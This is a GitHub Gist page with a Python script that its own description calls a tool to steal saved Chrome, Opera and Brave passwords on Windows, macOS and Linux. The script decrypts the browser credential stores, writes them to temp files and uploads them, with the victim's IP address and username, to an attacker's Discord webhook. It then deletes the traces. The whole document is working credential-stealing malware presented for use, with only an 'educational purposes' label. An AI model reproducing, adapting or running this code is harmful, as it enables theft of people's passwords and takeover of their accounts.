Created
January 22, 2022 00:48
-
-
Save Auax/5630518b9248d7acda7dd9bf0f561616 to your computer and use it in GitHub Desktop.
Steal Chrome, Opera, and Brave passwords in Windows, macOS, and Linux systems. Send the passwords to a Discord webhook by setting the URL in line 14. Educational purposes only.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import getpass | |
| import logging | |
| import os | |
| import platform | |
| import sys | |
| from os.path import join | |
| import requests.exceptions | |
| from discord_webhook import DiscordWebhook | |
| from passax.chrome import browsers | |
| from requests import get | |
| # Discord webhook URL goes here | |
| discord_webhook_url = "<your webhook>" | |
| sys_ = platform.system() | |
| # Get the temp path for every system | |
| TEMP_PATH = r"C:\Users\{}\AppData\Local\Temp".format( | |
| getpass.getuser()) if sys_ == "Windows" else "/tmp" | |
| # Importing passax for the target platform | |
| if sys_ == "Windows": | |
| from passax.chrome import windows as psx | |
| elif sys_ == "Linux": | |
| from passax.chrome import linux as psx | |
| elif sys_ == "Darwin": | |
| from passax.chrome import macos as psx | |
| # Logger | |
| handlers = [logging.StreamHandler()] | |
| logging.basicConfig( | |
| format="%(asctime)s - %(levelname)s : %(message)s", | |
| level=logging.INFO, | |
| datefmt='%d-%b-%y %H:%M:%S', | |
| handlers=handlers) | |
| os.system("cls" if sys_ == "Windows" else "clear") | |
| def main(): | |
| # Get IP address | |
| ipaddr = get('https://api.ipify.org').text | |
| # Start webhook instance | |
| hook = DiscordWebhook( | |
| url=discord_webhook_url, | |
| content=f"**IP address:** {ipaddr}\n**Username**: {getpass.getuser()}", | |
| username="Auax" | |
| ) | |
| # Iterate through the handled browsers | |
| for browser in browsers.available_browsers: | |
| browser_name = browser.base_name | |
| print(f"- {browser_name.capitalize()}") | |
| logging.info(browser_name.capitalize()) | |
| try: | |
| filename = join(TEMP_PATH, f"{browser_name}.txt") | |
| win = psx.Chrome(browser, blank_passwords=False) | |
| logging.info( | |
| f"Getting database paths and keys for {platform.system()}...") | |
| win.fetch() | |
| logging.info("Fetching database values...") | |
| win.retrieve_database() | |
| if not win.save(filename): | |
| print(f"Couldn't save: {filename}!") | |
| logging.info(f"File saved to: {filename}") | |
| except Exception as E: | |
| print(f"\nSkipping {browser_name()}\n") | |
| logging.warning(f"\nSkipping {browser_name()}") | |
| logging.error(E) | |
| continue | |
| # Read saved password files to send them through a hook. | |
| with open(filename, "rb") as file: | |
| hook.add_file(file=file.read(), filename=filename) | |
| try: | |
| logging.info(f"Removing {filename}...") | |
| os.remove(filename) # Delete temp files | |
| except OSError: | |
| logging.warning(f"Couldn't remove {filename}") | |
| pass | |
| try: | |
| hook.execute() # Send webhook | |
| except requests.exceptions.MissingSchema: | |
| logging.error("Invalid Discord Hook URL") | |
| print("\nInvalid Discord Hook URL. Exiting...") | |
| sys.exit(-1) | |
| if __name__ == '__main__': | |
| try: | |
| main() | |
| except KeyboardInterrupt: | |
| sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment